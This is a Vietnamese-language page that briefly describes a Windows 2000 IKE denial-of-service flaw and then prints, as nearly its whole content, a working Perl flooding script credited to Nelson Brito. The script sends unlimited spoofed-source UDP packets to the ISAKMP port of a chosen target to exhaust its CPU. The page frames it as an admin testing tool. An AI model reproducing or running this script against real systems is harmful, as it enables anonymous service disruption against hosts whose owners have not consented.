Windows 2000 IKE DoS Exploit Code :
trang này đã được đọc lần1 lỗ hổng bảo mật lớn trong hệ điều
hành Windows 2000 cho phép kẻ tấn công điều khiển từ xa làm tiêu hao dần số
lượng CPU time. Sau đây là 1 đoạn Code khai thác lỗi này, dùng để kiểm tra hệ
thống của admin : #!/usr/bin/perl -w :
use Socket;
use Net::RawIP;
use Getopt::Std;
getopts("s:d:p:l:n:v:t:f:T:rL",%o);$ver="0.3a";$0=~s#.*/##;
print"--- $0 v.$ver b/ Nelson Brito / Independent Security Consultant --- ";
$l=$o{'l'}?$o{'l'}+28:800+28;$n=$o{'n'}?$o{'n'}/2:800/2;
$v=$o{'v'}||4;$t=$o{'t'}||1;$f=$o{'f'}||0;$T=$o{'T'}||64;
$p=$o{'p'}?$o{'p'}:(getservbyname('isakmp','udp')||die"getservbyname: $! ");
($o{'s'}&&$o{'d'})||die
" Use: $0 [IP Options] [UDP Options] ",
"IP Options: ",
" -s* source address to spoof ",
" -d* destination address to attack ",
" -v IP Version (def: $v) ",
" -t IP Type of Service (TOS) (def: $t) ",
" -f IP fragementation offset (def: $f) ",
" -T IP Time to Live (TTL) (def: $T) ",
"UDP Options: ",
" -p destination port to attack (def: $p) ",
" -l packet length to send (def: $l) ",
" -r set randon data (def: ".") ",
"Generic: ",
" -n number of packets to send (def: $n) ",
" -L send packets forever ",
"Copyright © 2000 Nelson Brito . ";
while($n > 0){
$|=1;print".";$sp=int rand 65535;
$D=$o{'r'}?(chr(int rand 255)) x $l:"." x $l;
$nb=new Net::RawIP({
ip=>
{
version=>$v,
tos=>$t,
ttl=>$T,
frag_off=>$f,
saddr=>$o{'s'},
daddr=>$o{'d'}
},
udp=>
{
source=>$sp,
dest=>$p,
len=>$l,
data=>$D
}
});
$nb->send;undef $nb;!$o{'L'}&&$n--;
}
print"Finish! "; 